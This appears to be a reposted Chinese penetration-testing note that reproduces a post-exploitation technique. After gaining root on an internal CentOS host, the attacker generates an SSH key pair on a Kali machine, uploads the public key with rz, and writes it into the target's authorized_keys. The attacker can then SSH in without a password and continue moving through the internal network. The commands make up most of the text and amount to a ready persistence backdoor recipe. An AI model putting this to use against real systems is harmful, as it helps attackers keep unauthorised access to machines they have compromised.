无密码正向直连内网linux目标机复现
文章来自sxf大佬klion
https://mp.weixin.qq.com/s/GPPvci8qKuvc5d3Q7Cer7Q
场景说明
前期通过一些 Rce,提权 或者其它方式,拿到内网一台linux 目标机的root权限,但用户密码hash跑不出来,机器无法正常出网,Webshell 里操作实在是麻烦, 费劲,为了能更方便的进行后续的内网渗透操作,现在就迫切需要一个真正的pts终端,怎么搞 ?
复现
目标机:centos7 192.168.232.128
攻击机:kali 192.168.232.129
0x01 攻击机生成密钥
# cd ~/.ssh //没有自己建
# ssh-keygen -t rsa //一直回车就OK,在/root/.ssh/id_rsa.pub文件这个是我们需要上传到目标服务器上的
0x02 rz上传文件至目标服务器
如何服务器不支持请安装
yum -y install lrzsz
然后rz -be 上面的id_rsa.pub
0x03 导入文件
把id_rsa.pub导入authorized_keys文件,没有这个文件自己创建
cat id_rsa.pub > ~/.ssh/authorized_keys
0x04 直接连接
攻击机直接使用ssh连接
ssh 192.168.232.128
这里可以使用rpm -qa | grep ssh查看目标是否安装ssh服务
